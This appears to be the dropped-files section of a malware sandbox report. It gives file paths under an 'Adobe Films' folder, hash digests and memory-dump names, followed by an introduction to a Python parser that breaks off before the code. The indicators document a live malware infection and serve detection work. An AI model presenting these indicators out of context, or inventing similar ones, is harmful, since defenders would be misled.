SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

memory/1900-143-0x00000000015B0000-0x0000000001E46000-memory.dmp

\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

MD5 0526c3f2c76e9f5d19fa2a1267fae065
SHA1 fe89bf1569ca378fbdf27bcf53cf5daf26696e2f
SHA256 25fccde6303108b00272a40405566706292291ebb62a670efe65ad6dad6ca66a
SHA512 49d15c5397fe690860ff7fac6d18675fd9e990cd635c7c6b371ac9cd5c2d3e1ee822d771e4b7875b5424244bae4b7004460cc027ea8831271de6d95e04d0cb78

C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

MD5 0526c3f2c76e9f5d19fa2a1267fae065
SHA1 fe89bf1569ca378fbdf27bcf53cf5daf26696e2f
SHA256 25fccde6303108b00272a40405566706292291ebb62a670efe65ad6dad6ca66a
SHA512 49d15c5397fe690860ff7fac6d18675fd9e990cd635c7c6b371ac9cd5c2d3e1ee822d771e4b7875b5424244bae4b7004460cc027ea8831271de6d95e04d0cb78

\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

MD5 0526c3f2c76e9f5d19fa2a1267fae065
SHA1 fe89bf1569ca378fbdf27bcf53cf5daf26696e2f
SHA256 25fccde6303108b00272a40405566706292291ebb62a670efe65ad6dad6ca66a
SHA512 49d15c5397fe690860ff7fac6d18675fd9e990cd635c7c6b371ac9cd5c2d3e1ee822d771e4b7875b5424244bae4b7004460cc027ea8831271de6d95e04d0cb78

memory/1440-126-0x0000000006DB0000-0x0000000007646000-memory.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe

MD5 a7f0db730ffc25346b807b44e22d76e2
SHA1 2cd65e498430b3a083437bbb004c85194743fcba
SHA256 2e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d
SHA512 a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b

C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

MD5 22922137714e5791617bc3c9710615b6
SHA1 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256 f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512 ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00

memory/1996-112-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512 febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5

\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

MD5 0526c3f2c76e9f5d19fa2a1267fae065
SHA1 fe89bf1569ca378fbdf27bcf53cf5daf26696e2f
SHA256 25fccde6303108b00272a40405566706292291ebb62a670efe65ad6dad6ca66a
SHA512 49d15c5397fe690860ff7fac6d18675fd9e990cd635c7c6b371ac9cd5c2d3e1ee822d771e4b7875b5424244bae4b7004460cc027ea8831271de6d95e04d0cb78

memory/1552-101-0x0000000000000000-mapping.dmp

memory/364-109-0x0000000000000000-mapping.dmp

memory/1520-149-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

memory/1900-158-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/2132-179-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe

MD5 b57d28ba7854b185f098a538af3b8e36
SHA1 c36d58fcec162801c15768b78c36b1464e9cbb66
SHA256 e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec
SHA512 f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d

\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

MD5 c7a7b834e68cece0ac292bc991af7908
SHA1 bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3

memory/1520-181-0x0000000001390000-0x00000000013E9000-memory.dmp

memory/1060-182-0x00000000024E0000-0x0000000002B65000-memory.dmp

memory/1520-183-0x00000000001C0000-0x0000000000219000-memory.dmp

\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

MD5 c7a7b834e68cece0ac292bc991af7908
SHA1 bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3

C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

MD5 c7a7b834e68cece0ac292bc991af7908
SHA1 bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3

memory/1440-173-0x0000000002700000-0x0000000002759000-memory.dmp

memory/1520-184-0x00000000001C0000-0x0000000000219000-memory.dmp

\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

MD5 c7a7b834e68cece0ac292bc991af7908
SHA1 bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3

memory/1640-162-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe

MD5 5163ae847dec4b423a4e9b1eb43d3864
SHA1 15e41ab0f8b44ae83baf879f04e60ff68f5959d1
SHA256 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430
SHA512 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b

\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe

MD5 5163ae847dec4b423a4e9b1eb43d3864
SHA1 15e41ab0f8b44ae83baf879f04e60ff68f5959d1
SHA256 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430
SHA512 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b

memory/1060-152-0x0000000000000000-mapping.dmp

memory/1996-185-0x0000000000C71000-0x0000000000C9E000-memory.dmp

memory/1088-186-0x0000000000400000-0x0000000000885000-memory.dmp

memory/1996-188-0x00000000023C0000-0x000000000240D000-memory.dmp

\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe

MD5 b57d28ba7854b185f098a538af3b8e36
SHA1 c36d58fcec162801c15768b78c36b1464e9cbb66
SHA256 e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec
SHA512 f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d

memory/1088-189-0x0000000000400000-0x0000000000885000-memory.dmp

\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

MD5 c7a7b834e68cece0ac292bc991af7908
SHA1 bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA512 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3

\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

MD5 4aa2ed3cbbc9843b66715959adf53589
SHA1 f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744

memory/1088-154-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

memory/1900-99-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe

MD5 a7f0db730ffc25346b807b44e22d76e2
SHA1 2cd65e498430b3a083437bbb004c85194743fcba
SHA256 2e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d
SHA512 a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b

memory/1088-190-0x0000000000E40000-0x0000000000E64000-memory.dmp

memory/2008-104-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

memory/1440-191-0x0000000002700000-0x0000000002759000-memory.dmp

memory/1512-107-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

MD5 b22cf896430a7bae5e38c51a7e0ac494
SHA1 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512 a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854

memory/2324-193-0x0000000000000000-mapping.dmp

memory/1996-194-0x0000000000400000-0x0000000000A94000-memory.dmp

memory/2356-195-0x0000000000000000-mapping.dmp

memory/2336-196-0x0000000000000000-mapping.dmp

memory/1060-192-0x00000000024E0000-0x0000000002B65000-memory.dmp

memory/2348-197-0x0000000000000000-mapping.dmp

memory/1520-199-0x00000000001C0000-0x0000000000219000-memory.dmp

memory/2336-200-0x0000000001390000-0x00000000013E9000-memory.dmp

memory/2336-201-0x0000000000100000-0x0000000000159000-memory.dmp

memory/2336-202-0x0000000000100000-0x0000000000159000-memory.dmp

memory/2496-203-0x0000000000000000-mapping.dmp

memory/1088-204-0x0000000000FB0000-0x0000000000FD2000-memory.dmp

memory/2544-207-0x0000000000000000-mapping.dmp

memory/2536-210-0x0000000000000000-mapping.dmp

memory/2604-213-0x0000000000000000-mapping.dmp

memory/2616-214-0x0000000000000000-mapping.dmp

memory/364-217-0x00000000026B0000-0x00000000026E0000-memory.dmp

memory/364-218-0x0000000002820000-0x0000000002850000-memory.dmp

memory/364-219-0x0000000000C91000-0x0000000000CBC000-memory.dmp

memory/364-220-0x00000000002A0000-0x00000000002D8000-memory.dmp

memory/364-222-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/2716-223-0x0000000000000000-mapping.dmp

memory/2748-225-0x0000000000000000-mapping.dmp

memory/1900-226-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/1520-227-0x00000000001C0000-0x0000000000219000-memory.dmp

memory/1996-228-0x00000000023C0000-0x000000000240D000-memory.dmp

memory/1440-229-0x0000000002700000-0x0000000002759000-memory.dmp

memory/1520-230-0x0000000001390000-0x00000000013E9000-memory.dmp

memory/1520-231-0x00000000001C0000-0x0000000000219000-memory.dmp

memory/1996-232-0x0000000000C71000-0x0000000000C9E000-memory.dmp

memory/2716-234-0x0000000002640000-0x0000000002674000-memory.dmp

memory/2716-235-0x00000000028F0000-0x0000000002924000-memory.dmp

memory/1520-237-0x00000000001C0000-0x0000000000219000-memory.dmp

memory/1060-238-0x00000000024E0000-0x0000000002B65000-memory.dmp

memory/1440-236-0x0000000002700000-0x0000000002759000-memory.dmp

memory/2716-239-0x0000000000240000-0x0000000000340000-memory.dmp

memory/2896-241-0x0000000000000000-mapping.dmp

memory/2716-240-0x00000000003C0000-0x00000000003FA000-memory.dmp

memory/2716-243-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/2896-244-0x00000000011A0000-0x00000000011AE000-memory.dmp

memory/2956-245-0x0000000000000000-mapping.dmp

memory/2336-247-0x0000000001390000-0x00000000013E9000-memory.dmp

memory/2336-248-0x0000000000100000-0x0000000000159000-memory.dmp

memory/2992-249-0x0000000000000000-mapping.dmp

memory/3004-250-0x0000000000000000-mapping.dmp

memory/1440-253-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/364-254-0x0000000000C91000-0x0000000000CBC000-memory.dmp

memory/1460-255-0x0000000000000000-mapping.dmp

memory/2716-257-0x0000000000240000-0x0000000000340000-memory.dmp

memory/1068-258-0x0000000000130000-0x00000000002F0000-memory.dmp

memory/1068-259-0x0000000004950000-0x00000000049DE000-memory.dmp

memory/1068-260-0x0000000000BE0000-0x0000000000C2C000-memory.dmp

memory/568-261-0x0000000000000000-mapping.dmp

memory/1060-263-0x0000000000BC0000-0x0000000000D5D000-memory.dmp

memory/568-264-0x0000000068F20000-0x00000000694CB000-memory.dmp

memory/1060-265-0x00000000009F0000-0x0000000000BE2000-memory.dmp

memory/568-266-0x0000000068F20000-0x00000000694CB000-memory.dmp

memory/2716-267-0x0000000000240000-0x0000000000340000-memory.dmp

memory/2716-268-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/1060-269-0x00000000009F0000-0x0000000000BE2000-memory.dmp

memory/364-270-0x0000000000C91000-0x0000000000CBC000-memory.dmp

memory/364-271-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/1088-272-0x0000000000400000-0x0000000000885000-memory.dmp

memory/1900-273-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/2172-274-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/2000-275-0x0000000000321000-0x000000000034E000-memory.dmp

memory/2320-278-0x0000000000000000-mapping.dmp

memory/2728-279-0x0000000000000000-mapping.dmp

memory/2264-282-0x0000000000000000-mapping.dmp

memory/2964-287-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-288-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-290-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-291-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-292-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-293-0x000000000041824E-mapping.dmp
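
The Files section above lists each dropped file as a path followed by four digests, interleaved with memory dump names of the form memory/<pid>-<seq>-<start>-<end>-memory.dmp or memory/<pid>-<seq>-<address>-mapping.dmp, and the same file can appear under both the "C:\Users\..." and the "\Users\..." spelling. The Python below is an added example, not part of the sandbox report or its tooling: it parses that layout into a set of distinct files keyed by SHA256 (checking digest lengths and that repeated entries agree with each other), and indexes the dumps per PID so that address ranges dumped more than once, and mapping addresses that fall inside a dumped range, can be picked out for carving. The meaning of the dump-name fields is inferred from the names themselves, folding a drive-less path onto C: is an assumption, and the sample input is constructed from a few entries on this page.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the Files section above: one dropped file listed
# under both path spellings the report uses, and dump names for two PIDs.
SAMPLE_FILES_SECTION = r"""
C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5

memory/1088-186-0x0000000000400000-0x0000000000885000-memory.dmp
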